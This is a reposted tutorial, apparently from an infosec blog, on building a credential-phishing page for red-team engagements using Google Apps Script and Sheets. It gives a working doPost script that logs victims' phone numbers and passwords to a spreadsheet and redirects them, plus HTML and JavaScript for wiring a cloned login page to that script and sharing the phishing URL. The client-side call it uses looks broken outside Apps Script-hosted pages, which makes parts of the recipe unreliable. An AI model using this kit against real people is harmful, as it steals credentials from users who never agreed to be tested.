Phishing using Google Sheets for Red Team Engagements
2024-1-17 22:53:58 Author: infosecwriteups.com(查看原文) 阅读量:23 收藏

  1. Navigate to Google Sheets and create a sheet
  2. Navigate to Extensions > App Scripts
App Script

3. Add below script to the Code.gs

// Google Apps Script code
var SPREADSHEET_ID = 'YOUR_SPREADSHEET_ID';

function doPost(e) {
var phone = e.parameter.phone;
var password = e.parameter.password;

// Open the spreadsheet using its ID
var sheet = SpreadsheetApp.openById(SPREADSHEET_ID).getActiveSheet();

// Append the data to the sheet
sheet.appendRow([phone, password]);

// Redirect to google.com
return ContentService.createTextOutput('<script>window.location.href="https://www.google.com";</script>').setMimeType(ContentService.MimeType.HTML);
}

Now Replace ‘YOUR_SPREADSHEET_ID’ with your SpreadSheet ID which can be founded in your created Google Sheet URL.

It should look like below,

Spreadsheet ID

Change below Input fields according to your web application

// Append the data to the sheet
sheet.appendRow([phone, password]);

Change below URL which you need to redirect the user once the credentials are given

// Redirect to google.com
return ContentService.createTextOutput('<script>window.location.href="https://www.google.com";</script>').setMimeType(ContentService.MimeType.HTML);

Once changes completed, Deploy the App Script using Deploy Option

Select the Web App option as shown below

Select Type

Then Authorize the Web App with your Google Account

Authorize

Now Copy the sharable script URL and move to the cloned web app and a place this sharable script URL inside the <head> </head> tag

<!DOCTYPE html><html><head >
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>TEST</title>
<script src="https://script.google.com/macros/s/tttttttttttt/exec"></script>
</head>

Finally, Place below code after the Login Input Form by calling your Inputs

<script>
function submitForm() {
var phone = document.getElementById("phone").value;
var password = document.getElementById("password").value;

// Call the Google Apps Script function with the form data
google.script.run.doPost({ phone: phone, password: password });
}
</script>

Now Host your Web App in a VPS or your preferred environment and Test the Login Page. Once tested you will see that the Credentials are captured in the Google Sheets as below.

Login Results

By this way you will not require any PHP or any other functions where you could host a simple python server in your VPS and Share the Phishing URL to the Users


文章来源: https://infosecwriteups.com/phishing-using-google-sheets-for-red-team-engagements-ac79298ddb90?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh